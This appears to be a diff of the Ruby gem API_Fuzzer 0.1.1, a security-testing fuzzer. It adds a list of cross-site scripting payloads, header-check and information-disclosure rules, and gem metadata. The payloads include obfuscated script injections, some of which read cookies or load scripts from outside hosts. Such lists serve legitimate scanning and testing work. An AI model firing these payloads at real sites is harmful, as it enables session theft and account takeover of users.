API_Fuzzer 0.1.1

data/payloads/xss.txt

@@ -0,0 +1,58 @@
+' onmouseover=alert(/Black.Spook/)
+";eval(unescape(location))//#  %0Aalert(0)
+"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+"><iframe%20src="http://google.com"%%203E
+"><img src=x onerror=prompt(1);>
+&lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+&lt;SCRIPT SRC=//xss.rocks/.j>
+'); alert('XSS
+"><script>alert(1)</script>
+\";alert('XSS');//
+<%<!--'%><script>alert(1);</script -->
+<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
+<--`<img/src=` onerror=alert(1)> --!>
+<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
+<<scr\0ipt/src=http://xss.com/xss.js></script
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+<a  href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click  Me</a>
+<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
+<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
+<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
+<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
+<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
+<a onmouseover="alert(document.cookie)">xxs link</a>
+<a onmouseover=alert(document.cookie)>xxs link</a>
+<iframe/onreadystatechange=alert(1)
+<iframe/src \/\/onload = prompt(1)
+<IMG DYNSRC=\"javascript:alert('XSS')\">
+<IMG onmouseover="alert('xxs')">
+<img src ?itworksonchrome?\/onerror = alert(1)???
+<IMG SRC= onmouseover="alert('xxs')">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<img src="/" =_=" title="onerror='prompt(1)'">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
+<IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
+<IMG SRC="javascript:alert('XSS')"
+<img src="javascript:alert('XSS')">
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<img src=`xx:xx`onerror=alert(1)>
+<svg contentScriptType=text/vbs><script>MsgBox+1
+<svg/onload=alert(1)
+<svg><script ?>alert(1)
+<svg><script onlypossibleinopera:-)> alert(1)
+<svg><script>//&NewLine;confirm(1);</script </svg>
+<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
+<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
+<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
+<var onmouseover="prompt(1)">On Mouse Over</var>?
+http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
+http://www.<script>alert(1)</script .com
+https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
+javascript:alert%28/xss/%29
+javascript:alert(1)
+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+x”</title><img src%3dx onerror%3dalert(1)>
+[[#%3Cscript%3Ealert(1)%3C/script%3E|

data/rules/headers.yml

@@ -0,0 +1,17 @@
+--- 
+rules:
+
+  -
+    description: X-XSS Protection Header is not set properly
+    name: x-xss-protection
+    match: \A[01](; mode=block)?(; report=.*)?\z
+
+  -
+    description: Possible Clickjacking Vulnerability
+    name: x-frame-options
+    match: \A(SAMEORIGIN\z|DENY\z)
+
+  -
+    description: HSTS protection is not enabled in service
+    name: strict-transport-security
+    match: \Amax-age=\d+(; includeSubdomains)?(; preload)?\z

data/rules/info.yml

@@ -0,0 +1,21 @@
+---
+rules:
+
+  -
+    #Server
+    description: Information Disclosure of Server version
+    match: server
+  -
+    # Powered-by Header
+    description: Information Disclosure through x-powered-by
+    match: x-powered-by
+
+  -
+    # ASP.NET MVC version
+    description: Information Disclosure of APS.NET MVC version
+    match: x-aspnetmvc-version
+
+  -
+    # ASP.NET version
+    description: Information Disclosure of ASP.NET version
+    match: x-aspnet-version

metadata

@@ -0,0 +1,163 @@
+--- !ruby/object:Gem::Specification
+name: API_Fuzzer
+version: !ruby/object:Gem::Version
+  version: 0.1.1
+platform: ruby
+authors:
+- Lalith Rallabhandi
+autorequire: 
+bindir: exe
+cert_chain: []
+date: 2016-10-14 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: http
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '2.0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '2.0'
+- !ruby/object:Gem::Dependency
+  name: activesupport
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rails
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '4.2'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '>='
+      - !ruby/object:Gem::Version
+        version: '4.2'
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '1.12'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '1.12'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '10.0'
+- !ruby/object:Gem::Dependency
+  name: minitest
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '5.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: '5.0'
+description: APIFuzzer gem builds api for finding security issues through a fuzzer
+email:
+- lalithr95@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- .gitignore
+- .travis.yml
+- API_Fuzzer.gemspec
+- CODE_OF_CONDUCT.md
+- Gemfile
+- LICENSE.txt
+- README.md
+- Rakefile
+- app/controllers/ping_controller.rb
+- bin/console
+- bin/setup
+- config/routes.rb
+- lib/API_Fuzzer.rb
+- lib/API_Fuzzer/csrf_check.rb
+- lib/API_Fuzzer/engine.rb
+- lib/API_Fuzzer/error.rb
+- lib/API_Fuzzer/header_info.rb
+- lib/API_Fuzzer/idor_check.rb
+- lib/API_Fuzzer/privilege_escalation_check.rb
+- lib/API_Fuzzer/rate_limit_check.rb
+- lib/API_Fuzzer/redirect_check.rb
+- lib/API_Fuzzer/request.rb
+- lib/API_Fuzzer/resource_info.rb
+- lib/API_Fuzzer/sql_blind_check.rb
+- lib/API_Fuzzer/sql_check.rb
+- lib/API_Fuzzer/version.rb
+- lib/API_Fuzzer/vulnerability.rb
+- lib/API_Fuzzer/xss_check.rb
+- lib/API_Fuzzer/xxe_check.rb
+- payloads/blind_sql.txt
+- payloads/detect/sql.txt
+- payloads/sql.txt
+- payloads/xss.txt
+- rules/headers.yml
+- rules/info.yml
+homepage: https://github.com/lalithr95/API-Fuzzer
+licenses:
+- MIT
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - '>='
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - '>='
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.6.6
+signing_key: 
+specification_version: 4
+summary: APIFuzzer gem builds api for finding security issues through a fuzzer
+test_files: []